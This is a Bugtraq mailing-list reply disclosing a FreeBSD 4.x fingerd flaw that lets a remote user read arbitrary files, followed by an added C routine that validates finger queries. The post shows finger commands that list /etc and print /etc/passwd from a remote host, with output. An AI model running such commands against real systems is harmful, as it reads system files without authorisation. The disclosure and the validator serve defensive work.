Bugtraq mailing list archives

Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable]
From: Przemyslaw Frasunek <venglin () FREEBSD LUBLIN PL>
Date: Tue, 3 Oct 2000 20:18:12 +0200

On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:
> If finger takes a full path name as a user name, it prints out the contents of
> that file.  Because fingerd executes finger as the local information
> provider, finger /path/to/file@some.host prints /path/to/file at
> some.host.

BTW, the problem persists only in the 4.x branch. Of course, it also allows
traversing directory structures:

riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^ () ^@^L^ () ^D^A ^@^ () ^@^B^ () ^@^ () ^L^@^D^B..^ () ^@^ () ^W^A^@^T^ () ^D^Hdefaults^@^A^ () ^@^A
^ () ^@^T^ () ^H      protocols^ () ^@^ () ^B

riget:venglin:~> finger /etc/passwd@lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *
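The input check the post implies, as an added example that is not part of the original message and not FreeBSD's fingerd code: a C routine of the sort a fingerd or a finger wrapper could apply to the raw query line before handing it to finger(1), so that anything containing '/' (a path such as /etc/passwd or /etc/) is refused instead of being treated as a user name. The length limit, the accepted character set and the sample queries are constructed assumptions for illustration.

```c
/* Added example: validate a finger query before passing it to finger(1).
 * Not FreeBSD's fingerd; the limits and sample inputs are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed upper bound on an account name in a query. */
#define FINGER_NAME_MAX 32

/* Return 1 if `name` is a plain account name: non-empty, within the length
 * limit, made only of [A-Za-z0-9._-], and not starting with '-' (would look
 * like an option to finger) or '.' (hidden-file look-alike). Anything with
 * '/' (a path), '@' (forwarding), whitespace or control bytes is rejected. */
int finger_name_ok(const char *name)
{
    if (name == NULL) return 0;
    size_t len = strlen(name);
    if (len == 0 || len > FINGER_NAME_MAX) return 0;
    if (name[0] == '-' || name[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return 0;
    }
    return 1;
}

/* Parse one raw query line as received on TCP port 79 (RFC 1288 shape: an
 * optional "/W" verbose flag, then at most one name, then CRLF). The bare
 * name is copied into `out` (size outsz) and *verbose is set. An empty name
 * means "list logged-in users" and is accepted. Returns 1 only when the line
 * is well-formed and the name passes finger_name_ok(); returns 0 otherwise,
 * in which case the query should be refused, never passed to finger(1). */
int finger_query_ok(const char *line, char *out, size_t outsz, int *verbose)
{
    char buf[256];
    size_t n = strlen(line);
    if (n >= sizeof buf) return 0;
    memcpy(buf, line, n + 1);
    /* strip trailing CR/LF */
    while (n > 0 && (buf[n - 1] == '\r' || buf[n - 1] == '\n')) buf[--n] = '\0';

    char *p = buf;
    *verbose = 0;
    while (*p == ' ') p++;
    if (p[0] == '/' && (p[1] == 'W' || p[1] == 'w') &&
        (p[2] == ' ' || p[2] == '\0')) {
        *verbose = 1;
        p += 2;
        while (*p == ' ') p++;
    }
    if (*p == '\0') {               /* no name: list users, nothing to check */
        if (outsz == 0) return 0;
        out[0] = '\0';
        return 1;
    }
    /* exactly one token: further tokens or stray whitespace are refused */
    if (strchr(p, ' ') != NULL || strchr(p, '\t') != NULL) return 0;
    if (!finger_name_ok(p)) return 0;
    if (strlen(p) + 1 > outsz) return 0;
    memcpy(out, p, strlen(p) + 1);
    return 1;
}

int main(void)
{
    /* constructed sample queries: the last two are the shapes from the post */
    const char *samples[] = { "venglin\r\n", "/W root\r\n", "\r\n",
                              "/etc/passwd\r\n", "/etc/\r\n" };
    char name[FINGER_NAME_MAX + 1];
    int verbose;
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int ok = finger_query_ok(samples[i], name, sizeof name, &verbose);
        printf("%-16s -> %s%s\n", samples[i][0] == '\r' ? "(empty)" : samples[i],
               ok ? "accept" : "REFUSE", (ok && verbose) ? " (verbose)" : "");
    }
    return 0;
}
```

The point of refusing at the fingerd layer rather than patching finger(1) alone is that fingerd is the only place that sees the untrusted network query; whatever local information provider it executes then only ever receives a plain account name.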